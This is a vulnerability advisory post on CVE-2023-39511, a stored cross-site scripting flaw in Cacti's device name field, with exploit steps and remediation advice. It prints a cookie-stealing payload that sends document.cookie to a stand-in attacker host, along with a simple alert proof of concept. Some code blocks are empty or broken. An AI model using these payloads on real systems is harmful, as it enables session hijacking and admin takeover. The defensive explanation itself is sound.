CVE CyberSecurity Database News

CVE-2023-39511 - How a Simple Device Name Can Compromise Cacti Admins (Exploit & Remediation Guide)

Poster -

Cacti is a popular open source platform used by IT teams for monitoring networks and devices. In July 2023, a significant security flaw was discovered: CVE-2023-39511. This vulnerability allows an *authenticated user* to inject persistent, malicious code into the Cacti database—which is later executed in the browser of any admin who views certain pages.

This guide explains how this *Stored Cross-Site Scripting (XSS)* flaw works, offers sample code to show its impact, summarizes how it can be exploited, and provides clear ways for users to protect their systems.

Reference:

- NVD CVE-2023-39511
- Cacti Changelog
- CENSUS Security Advisory

In plain English:
CVE-2023-39511 lets any user with permission to create or edit device names in Cacti inject malicious scripts that are stored in the database. When an admin later views a report featuring that device, the script runs in the admin's browser. This can lead to theft of cookies, session hijacking, or any action the admin can perform.

Where’s the Vulnerability?

When a user with suitable permissions (such as "General Administration > Sites/Devices/Data") in Cacti creates or edits a device, they can set its name. This name is later displayed, unfiltered, on the reports_admin.php page for admins.

- Input: /cacti/host.php – Device name field

Stored: In the devices table in the Cacti database

- Output: /cacti/reports_admin.php – Rendered in report without proper HTML filtering

Exploit Details

> Who can exploit?
Any authenticated user (not just admins) with “Sites/Devices/Data” rights.

Go to:

http://<HOST>/cacti/host.php

`html

`

`html

)">

`

Wait for an admin to visit the reports_admin.php page

http://<HOST>/cacti/reports_admin.php
7. The malicious script *executes in the admin’s browser*. At this point, the attacker can hijack the admin’s session, change data, add new users, or perform other privileged actions.

A simple proof-of-concept payload would be

<script>alert(document.cookie)</script>

A more realistic attack could be

<img src="x" onerror="fetch('http://attacker.site/?cookie='+encodeURIComponent(document.cookie))">

Insert into the Device Name field

!Malicious Device Name Example

Real-World Impact

- Administrative Account Compromise: Attackers can steal admin session cookies or execute actions as the admin.
- System Intrusion: With admin rights, the attacker may create new users, alter monitoring targets, or disrupt alerts.
- Further Exploitation: The attacker can plant additional exploits or backdoors for persistent access.

1. Official Fix:

Upgrade Cacti to version 1.2.25 or newer.

- Download latest Cacti
- Changelog details

If you can’t upgrade, manually filter HTML output. For example

- Modify relevant PHP templates to use htmlspecialchars($device_name, ENT_QUOTES, 'UTF-8') before outputting device names.

Example PHP sanitization

// Example fix inside reports_admin.php
echo htmlspecialchars($device_name, ENT_QUOTES, 'UTF-8');

3. Restrict Permissions:

Limit the number of users who can modify device names until you can patch.

Upgrade now if running Cacti ≤1.2.24.

- Audit your device names for strange or suspicious HTML/JS.

More Info and References

- CVE-2023-39511 on NIST NVD
- CENSUS Security Research
- Cacti Community Announcements

Conclusion

*CVE-2023-39511* is a serious but easily fixable bug in Cacti. It demonstrates how a simple field like “device name” can become a launch pad for serious attacks thanks to XSS. Admins should *update Cacti immediately*, review device inputs, and restrict permissions as an interim measure.

Stay vigilant!
If you have questions or want to discuss mitigation, visit the Cacti forum.


*This post is exclusive, written in simple language for the wider community. Please share with your teams and help keep systems secure.*

Timeline

Published on: 09/06/2023 18:15:08 UTC
Last modified on: 11/03/2023 21:15:15 UTC